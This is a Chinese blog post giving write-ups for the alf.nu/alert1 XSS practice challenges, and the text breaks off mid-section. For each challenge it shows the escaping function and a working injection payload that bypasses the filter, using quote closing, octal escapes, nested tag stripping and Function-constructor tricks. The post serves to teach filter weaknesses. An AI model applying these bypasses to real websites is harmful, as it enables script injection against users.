<!DOCTYPE html>
<html lang>
  <head><meta name="generator" content="Hexo 3.9.0"><meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">


<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">

<meta name="theme-color" content="#f8f5ec">
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">

<meta name="description" content="XSS练习:alf.nu/alert1 Write-ups"><meta name="keywords" content="sec|secruity|blog"><link rel="alternate" href="https://cxliker.github.io/rss" title="蛋挞的笔记本"><link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.11.1">
<link rel="canonical" href="https://cxliker.github.io/2018/01/29/XSS练习-alf-nu-alert1-Write-ups/">

<link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css"><link rel="stylesheet" type="text/css" href="/lib/nprogress/nprogress.min.css">
<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.11.1">

<script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?1fb3396bc01d62b8be6fcb651441065c";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script><script id="baidu_push">
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>
<script src="//cdn1.lncld.net/static/js/3.1.1/av-min.js"></script>
  <script id="leancloud">
    AV.init({
      appId: "92CcA9DvqYFSomQnzdApeHt9-gzGzoHsz",
      appKey: "gAPpmDXQmTGE9s9a3eU4nJ0h"
    });
  </script><script>
  window.config = {"leancloud":{"app_id":"92CcA9DvqYFSomQnzdApeHt9-gzGzoHsz","app_key":"gAPpmDXQmTGE9s9a3eU4nJ0h"},"toc":true,"fancybox":true,"pjax":true,"latex":false};
</script>

    <title>XSS练习:alf.nu/alert1 Write-ups - 蛋挞的笔记本</title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">蛋挞的笔记本</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list"><a href="/archives/">
        <li class="mobile-menu-item">归档
          </li>
      </a><a href="/about">
        <li class="mobile-menu-item">关于
          </li>
      </a></ul>
</nav>
<div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">蛋挞的笔记本</a>
</div>

<nav class="site-navbar"><ul id="menu" class="menu"><li class="menu-item">
          <a class="menu-item-link" href="/archives/">
            归档
            </a>
        </li>
      <li class="menu-item">
          <a class="menu-item-link" href="/about">
            关于
            </a>
        </li>
      </ul></nav>
</header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content"><article class="post">
    <header class="post-header">
      <h1 class="post-title">XSS练习:alf.nu/alert1 Write-ups
        </h1>

      <div class="post-meta">
        <span class="author">
          danta
        </span>
        <span class="post-time">
          2018-01-29 17:26
        </span><span class="post-visits" data-url="/2018/01/29/XSS练习-alf-nu-alert1-Write-ups/" data-title="XSS练习:alf.nu/alert1 Write-ups">
          Visits 0
        </span>
        </div>
    </header>

    <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Warmup"><span class="toc-text">Warmup</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Adobe"><span class="toc-text">Adobe</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#JSON"><span class="toc-text">JSON</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#JavaScript"><span class="toc-text">JavaScript</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Markdown"><span class="toc-text">Markdown</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#DOM"><span class="toc-text">DOM</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Callback"><span class="toc-text">Callback</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Skandia"><span class="toc-text">Skandia</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Template"><span class="toc-text">Template</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#JSON-1"><span class="toc-text">JSON ][</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Callback-1"><span class="toc-text">Callback ][</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Skandia-1"><span class="toc-text">Skandia ][</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#iframe"><span class="toc-text">iframe</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#TI-S-M"><span class="toc-text">TI(S)M</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#JSON-Ⅲ"><span class="toc-text">JSON Ⅲ</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Skandia-Ⅲ"><span class="toc-text">Skandia Ⅲ</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RFC4627"><span class="toc-text">RFC4627</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Brunn"><span class="toc-text">Brunn</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#No"><span class="toc-text">No</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#K’Z’K"><span class="toc-text">K’Z’K</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#K’Z’K-1"><span class="toc-text">K’Z’K</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#K’Z’K-2"><span class="toc-text">K’Z’K</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Fruit-1"><span class="toc-text">Fruit 1</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Fruit-2"><span class="toc-text">Fruit 2</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Fruit-3"><span class="toc-text">Fruit 3</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Quine"><span class="toc-text">Quine</span></a></li></ol>
    </div>
  </div><div class="post-content"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>这些天在<a href="https://alf.nu/alert1" target="_blank" rel="noopener">alf.nu/alert1</a>上做了XSS练习题，目前大部分做出来了，但有些题目并不是最优解。还剩下2道题没有做出（Fruit3, Qunie），在此做个记录。欢迎大家交流。</p>
<a id="more"></a>

<h1 id="Warmup"><a href="#Warmup" class="headerlink" title="Warmup"></a>Warmup</h1><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log("'</span>+s+<span class="string">'");&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题对输入没有限制，只要闭合掉console.log即可。<br>solution(12 chars): <code>&quot;);alert(1,&quot;</code><br><br><br><br><br></p>
<h1 id="Adobe"><a href="#Adobe" class="headerlink" title="Adobe"></a>Adobe</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  s = s.replace(<span class="regexp">/"/g</span>, <span class="string">'\\"'</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log("'</span> + s + <span class="string">'");&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题escape将输入的引号<code>&quot;</code>转换为了<code>\\&quot;</code>，使得引号变成了字面量，上一题的方法无效了。不过如果输入为<code>\&quot;</code>，那么就会转换为<code>\\\&quot;</code>，这个时候，本来是转义引号的，但变成了转义反斜杆了，从而引号可以逃脱转义了。<br>solution(14 chars): <code>\&quot;);alert(1)//</code><br><br><br><br><br></p>
<h1 id="JSON"><a href="#JSON" class="headerlink" title="JSON"></a>JSON</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  s = <span class="built_in">JSON</span>.stringify(s);</span><br><span class="line">  <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log('</span> + s + <span class="string">');&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这题对输入的字符串用了<code>JSON.stringify()</code>(<a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/JSON/stringify" target="_blank" rel="noopener">相关介绍</a>)来处理字符串。简单来说，就是过滤了<code>\</code>,<code>&quot;</code>等字符，分别转化为<code>\\</code>,<code>\&quot;</code>等，但没有过滤<code>&lt;</code>,<code>&gt;</code>,<code>/</code>字符，这就够用了。既然闭合不了<code>log</code>函数，那就闭合<code>script</code>标签吧<br>solution(27 chars): <code>&lt;/script&gt;&lt;script&gt;alert(1)//</code><br><br><br><br><br></p>
<h1 id="JavaScript"><a href="#JavaScript" class="headerlink" title="JavaScript"></a>JavaScript</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> url = <span class="string">'javascript:console.log('</span> + <span class="built_in">JSON</span>.stringify(s) + <span class="string">')'</span>;</span><br><span class="line">  <span class="built_in">console</span>.log(url);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">var</span> a = <span class="built_in">document</span>.createElement(<span class="string">'a'</span>);</span><br><span class="line">  a.href = url;</span><br><span class="line">  <span class="built_in">document</span>.body.appendChild(a);</span><br><span class="line">  a.click();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>同样因为<code>JSON.stringify()</code>的原因没办法用直接用<code>&quot;</code>，但是由于这次注入的地方是url，所以可以用URL编码的办法讲<code>&quot;</code>转换为<code>%22</code>。<br>solution(15 chars): <code>%22);alert(1)//</code><br><br><br><br><br></p>
<h1 id="Markdown"><a href="#Markdown" class="headerlink" title="Markdown"></a>Markdown</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> text = s.replace(<span class="regexp">/&lt;/g</span>, <span class="string">'&amp;lt;'</span>).replace(<span class="regexp">/"/g</span>, <span class="string">'&amp;quot;'</span>);</span><br><span class="line">  <span class="comment">// URLs</span></span><br><span class="line">  text = text.replace(<span class="regexp">/(http:\/\/\S+)/g</span>, <span class="string">'&lt;a href="$1"&gt;$1&lt;/a&gt;'</span>);</span><br><span class="line">  <span class="comment">// [[img123|Description]]</span></span><br><span class="line">  text = text.replace(<span class="regexp">/\[\[(\w+)\|(.+?)\]\]/g</span>, <span class="string">'&lt;img alt="$2" src="$1.gif"&gt;'</span>);</span><br><span class="line">  <span class="keyword">return</span> text;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先分析这题的处理方法</p>
<ol>
<li>首先，对于任何输入，先过滤掉<code>&lt;</code>和<code>&quot;</code>变为实体编码<code>&amp;lt</code>和<code>&amp;quot</code>。</li>
<li>如果字符串中有包含<code>http://</code>开头的字符串，例如<code>http://xiao.world</code>则变为<code>&lt;a href=&quot;http://xiao.world&quot;&gt;http://xiao.world&lt;/a&gt;</code></li>
<li>如果字符串中包含<code>[[img_src|img_alt]]</code>格式的字符串，则变为<code>&lt;img alt=&quot;img_alt&quot; src=&quot;this_src.git&quot;&gt;</code></li>
<li>返回字符串</li>
</ol>
<p>对于这个题目，因为尖括号和引号都被过滤了，所以要从这里入手会比较困难。但是可以利用第二点和第三点的规则来做突破口。为甚么这么说呢？既然自己没办法闭合属性的引号或者标签，但是规则二转换之后会带有引号，利用这个引号，就可以闭合掉规则三转换之后的img标签的alt属性了。<br>输入：<code>[[a|http://onerror=&#39;alert(1)]]</code><br>经过规则一转换后:<code>[[a|&lt;a href=&quot;http://onerror=&#39;alert(1)&#39;]]&quot;&gt;http://onerror=&#39;alert(1)&#39;]]&lt;/a&gt;</code><br>再经过规则二转换： <code>&lt;img alt=&quot;&lt;a href=&quot;http://onerror=&#39;alert(1)&#39;&quot; src=&quot;a.gif&quot;&gt;&quot;&gt;http://onerror=&#39;alert(1)&#39;]]&lt;/a&gt;</code><br>感谢HTML语言松散的特性，以上即相当于: <code>&lt;img alt=&quot;&lt;a href=&quot; http:=&quot;&quot; onerror=&quot;alert(1)&quot; &quot;=&quot;&quot; src=&quot;a.gif&quot;&gt;</code><br>再精简一点，只看关键部分: <code>&lt;img alt=&quot;&lt;a href=&quot; onerror=&quot;alert(1)&quot; src=&quot;a.git&quot;&gt;</code><br>至此，大功告成😄。<br>solution(31 chars): <code>[[a|http://onerror=&#39;alert(1)&#39;]]</code><br><br><br><br><br></p>
<h1 id="DOM"><a href="#DOM" class="headerlink" title="DOM"></a>DOM</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="comment">// Slightly too lazy to make two input fields.</span></span><br><span class="line">  <span class="comment">// Pass in something like "TextNode#foo"</span></span><br><span class="line">  <span class="keyword">var</span> m = s.split(<span class="regexp">/#/</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// Only slightly contrived at this point.</span></span><br><span class="line">  <span class="keyword">var</span> a = <span class="built_in">document</span>.createElement(<span class="string">'div'</span>);</span><br><span class="line">  a.appendChild(<span class="built_in">document</span>[<span class="string">'create'</span>+m[<span class="number">0</span>]].apply(<span class="built_in">document</span>, m.slice(<span class="number">1</span>)));</span><br><span class="line">  <span class="keyword">return</span> a.innerHTML;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>关键在于理解第八行的代码。<br>如果输入为<code>Element#alert</code><br>第八行为：<code>document[&quot;createElement&quot;].apply(document, &quot;alert&quot;)</code><br>相当于<code>document.createElement(&quot;alert&quot;)</code><br>这样只是创建了一个<code>&lt;alert&gt;</code>标签，我们没有办法注入。所以查一下document有哪些create开头的方法，一下列出一些常用的：</p>
<blockquote>
<p>createElement<br>createTextNode<br>createComment<br>createAttribute<br>createEvent</p>
</blockquote>
<p>这里看到有<code>createComment</code>就令人特别开心。所以答案见下<br>solution(32 chars): <code>Comment#&gt;&lt;iframe onload=alert(1)</code><br><br><br><br><br></p>
<h1 id="Callback"><a href="#Callback" class="headerlink" title="Callback"></a>Callback</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="comment">// Pass inn "callback#userdata"</span></span><br><span class="line">  <span class="keyword">var</span> thing = s.split(<span class="regexp">/#/</span>); </span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!<span class="regexp">/^[a-zA-Z\[\]']*$/</span>.test(thing[<span class="number">0</span>])) <span class="keyword">return</span> <span class="string">'Invalid callback'</span>;</span><br><span class="line">  <span class="keyword">var</span> obj = &#123;<span class="string">'userdata'</span>: thing[<span class="number">1</span>] &#125;;</span><br><span class="line">  <span class="keyword">var</span> json = <span class="built_in">JSON</span>.stringify(obj).replace(<span class="regexp">/&lt;/g</span>, <span class="string">'\\u003c'</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="string">"&lt;script&gt;"</span> + thing[<span class="number">0</span>] + <span class="string">"("</span> + json +<span class="string">")&lt;/script&gt;"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>随便输入点看看效果吧：<code>input1#input2</code><br>输出: <code>&lt;script&gt;input1({&quot;userdata&quot;:&quot;input2&quot;})&lt;/script&gt;</code><br>因为input1有输入要求，但是input2可以为任意值，所以我们的注入可以放在input2，但是在input2之前有一堆奇奇怪怪的东西，最直接简单的办法就是用引号闭合掉他们就好了。所幸input1并没有把单引号过滤掉，所以答案就是<br>solution(15 chars): <code>&#39;#&#39;;alert(1);//</code><br><br><br><br><br></p>
<h1 id="Skandia"><a href="#Skandia" class="headerlink" title="Skandia"></a>Skandia</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log("'</span> + s.toUpperCase() + <span class="string">'")&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>题目真短，但心思没少花呀。<br>js的方法名是大小写敏感的，如果把<code>alert</code>变为了<code>ALERT</code>，那就不行了。但是HTML标签名和属性名是不区分大小写的，所以我们可以闭合掉<code>&lt;script&gt;</code>标签，然后自己注入标签，利用<code>onload</code>属性出发<code>alert</code>，但是有个问题就是<code>alert</code>大小写怎么办呢？依我个人测试和理解(暂时未找到根据)，在属性值处使用实体编码的话，是可以自动解码的,其他地方则不行。所以，问题解决了。<br>solution(53 chars): <code>&lt;/script&gt;&lt;iframe onload=&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74(1)&gt;</code><br>但我这个解用了53个字符，并不是最短的，但是有人也有人做到了30多和40多的，我暂时也想不到什么办法。有知道的请告诉我一声，谢谢😄<br><br><br><br><br></p>
<h1 id="Template"><a href="#Template" class="headerlink" title="Template"></a>Template</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">htmlEscape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> s.replace(<span class="regexp">/./g</span>, <span class="function"><span class="keyword">function</span>(<span class="params">x</span>) </span>&#123;</span><br><span class="line">       <span class="keyword">return</span> &#123; <span class="string">'&lt;'</span>: <span class="string">'&amp;lt;'</span>, <span class="string">'&gt;'</span>: <span class="string">'&amp;gt;'</span>, <span class="string">'&amp;'</span>: <span class="string">'&amp;amp;'</span>, <span class="string">'"'</span>: <span class="string">'&amp;quot;'</span>, <span class="string">"'"</span>: <span class="string">'&amp;#39;'</span> &#125;[x] || x;       </span><br><span class="line">     &#125;);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">expandTemplate</span>(<span class="params">template, args</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> template.replace(</span><br><span class="line">        /&#123;(\w+)&#125;/g, </span><br><span class="line">        <span class="function"><span class="keyword">function</span>(<span class="params">_, n</span>) </span>&#123; </span><br><span class="line">           <span class="keyword">return</span> htmlEscape(args[n]);</span><br><span class="line">         &#125;);</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">return</span> expandTemplate(</span><br><span class="line">    <span class="string">"                                                \n\</span></span><br><span class="line"><span class="string">      &lt;h2&gt;Hello, &lt;span id=name&gt;&lt;/span&gt;!&lt;/h2&gt;         \n\</span></span><br><span class="line"><span class="string">      &lt;script&gt;                                       \n\</span></span><br><span class="line"><span class="string">         var v = document.getElementById('name');    \n\</span></span><br><span class="line"><span class="string">         v.innerHTML = '&lt;a href=#&gt;&#123;name&#125;&lt;/a&gt;';       \n\</span></span><br><span class="line"><span class="string">      &lt;\/script&gt;                                     \n\</span></span><br><span class="line"><span class="string">    "</span>,</span><br><span class="line">    &#123; <span class="attr">name</span> : s &#125;</span><br><span class="line">  );</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>简单来说，对输入字符串过滤掉尖括号，引号等，然后将处理完的字符串替换掉模板字符串中<code>{name}</code>。但是百密一疏，字符串中可以用8进制或者16进制来表示字符。所以答案就出来了。<code>&lt;</code>对应的八进制是<code>\74</code>。<br>solution(27): <code>\74iframe onload=alert(1)//</code><br><br><br><br><br></p>
<h1 id="JSON-1"><a href="#JSON-1" class="headerlink" title="JSON ]["></a>JSON ][</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  s = <span class="built_in">JSON</span>.stringify(s).replace(<span class="regexp">/&lt;\/script/gi</span>, <span class="string">''</span>);</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="string">'&lt;script&gt;console.log('</span> + s + <span class="string">');&lt;/script&gt;'</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这道题也挺有意思的。格式化之后再把<code>&lt;/script</code>替换成空串。使用一点技巧就可以绕过了。<br>solution(35): <code>&lt;/scr&lt;/scriptipt&gt;&lt;script&gt;alert(1)//</code><br><br><br><br><br></p>
<h1 id="Callback-1"><a href="#Callback-1" class="headerlink" title="Callback ]["></a>Callback ][</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="comment">// Pass inn "callback#userdata"</span></span><br><span class="line">  <span class="keyword">var</span> thing = s.split(<span class="regexp">/#/</span>); </span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!<span class="regexp">/^[a-zA-Z\[\]']*$/</span>.test(thing[<span class="number">0</span>])) <span class="keyword">return</span> <span class="string">'Invalid callback'</span>;</span><br><span class="line">  <span class="keyword">var</span> obj = &#123;<span class="string">'userdata'</span>: thing[<span class="number">1</span>] &#125;;</span><br><span class="line">  <span class="keyword">var</span> json = <span class="built_in">JSON</span>.stringify(obj).replace(<span class="regexp">/\//g</span>, <span class="string">'\\/'</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="string">"&lt;script&gt;"</span> + thing[<span class="number">0</span>] + <span class="string">"("</span> + json +<span class="string">")&lt;/script&gt;"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>和上面的题目<a href="#Callback">Callback</a>一样，只是因为过滤了<code>/</code>，不能用<code>//</code>注释了而已，那就换一种注释方式吧<br>solution(16): <code>&#39;#&#39;;alert(1)&lt;!--</code><br><br><br><br><br></p>
<h1 id="Skandia-1"><a href="#Skandia-1" class="headerlink" title="Skandia ]["></a>Skandia ][</h1><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">function escape(s) &#123;</span><br><span class="line">  if (/[&lt;&gt;]/.test(s)) return &apos;-&apos;;</span><br><span class="line"></span><br><span class="line">  return &apos;&lt;script&gt;console.log(&quot;&apos; + s.toUpperCase() + &apos;&quot;)&lt;/script&gt;&apos;;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先考虑到可以闭合<code>script</code>标签，但是这题过滤了尖括号，想到上一题<a href="#Template">Template</a>的方法，即用十六进制或八进制来表示尖括号，但是经过测试发现，在这题并不管用。想不明白为甚么，但是测试结果是：字符串的<code>replace</code>方法是认不出十六进或者八进制代表的字符的，但是<code>test</code>方法却可以。所以上一题Template用的过滤方法replace过滤<code>&lt;</code>括号时，由于我们用了<code>\74</code>来表示，而replace方法并不认识它，所以绕过了过滤。但是这题用了<code>test</code>方法，面对同样的情况，它知道<code>\74</code>即代表着<code>&lt;</code>，所以这个方法无效了。<br>既然不能闭合<code>script</code>，那就可以考虑闭合<code>log</code>，应该注入的payload是<code>&quot;);alert(1)//</code>，但是alert转为大写就不行了。此时最简单粗暴的方法是直接用<a href="http://utf-8.jp/public/jjencode.html" target="_blank" rel="noopener">jjencode</a>( an online non-alphanumeric encoder)。将<code>alert(1)</code>用jjencode encode得到的转码后的结果，由于结果太长了，所以用jjencode代表，则<br>solutioon(538)为: <code>&quot;);jjencode//</code></p>
<p>但是538个字符还是太长了。在<a href="http://www.pwntester.com/blog/2014/01/08/escape-alf-nu-xss-challenges-write-ups-part-257/" target="_blank" rel="noopener">pwntester</a>的博客里看到了一个更好的办法。<br>首先应该注入的payload是<code>&quot;+alert(1))//&quot;</code><br>但是要想办法用相等效果的语句替换掉alert(1)。<br>在博客上看到一个方法也可以触发alert(1)</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[][<span class="string">"sort"</span>][<span class="string">"constructor"</span>](<span class="string">"alert(1)"</span>)()</span><br></pre></td></tr></table></figure>

<p>这个关键在于<code>Function(&quot;code&quot;)</code>。它可以将字符串作为参数传进去，返回一个以传进去的字符串为函数体的匿名函数。所以这个函数可以让你将字符串当作代码来执行。我们可以通过<code>[][&#39;sort&#39;][&#39;constructor&#39;]</code>来获得这个函数。<br><img src="/image/3.png" alt><br>顺便简单说一下，<code>[]</code>定义了一个空数组，数组自带了很多方法，<code>sort</code>是其中一个，还有很多方法，随便用一个都行，这里就用了sort。<code>[][&quot;sort&quot;]</code>的效果相当于<code>[].sort</code>。<br>所有payload可以改为<code>&quot;+[][&quot;sort&quot;][&quot;constructor&quot;](&quot;alert(1)&quot;)())+&quot;</code><br>此时又多了一个新的问题，用什么来代替上面的三个字符串呢？<br>这时候就可以用题目Template中用到的方法了，用八进制来代替字母。<br>所以答案就出来了：<br>solution(99): <code>&quot;+[][&quot;\160\157\160&quot;][&quot;\143\157\156\163\164\162\165\143\164\157\162&quot;](&#39;\141\154\145\162\164(1)&#39;)()+&quot;</code>  </p>
<p><br><br><br><br></p>
<h1 id="iframe"><a href="#iframe" class="headerlink" title="iframe"></a>iframe</h1><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params">s</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> tag = <span class="built_in">document</span>.createElement(<span class="string">'iframe'</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// For this one, you get to run any code you want, but in a "sandboxed" iframe.</span></span><br><span class="line">  <span class="comment">//</span></span><br><span class="line">  <span class="comment">// https://4i.am/?...raw=... just outputs whatever you pass in.</span></span><br><span class="line">  <span class="comment">//</span></span><br><span class="line">  <span class="comment">// Alerting from 4i.am won't count.</span></span><br><span class="line"></span><br><span class="line">  s = <span class="string">'&lt;script&gt;'</span> + s + <span 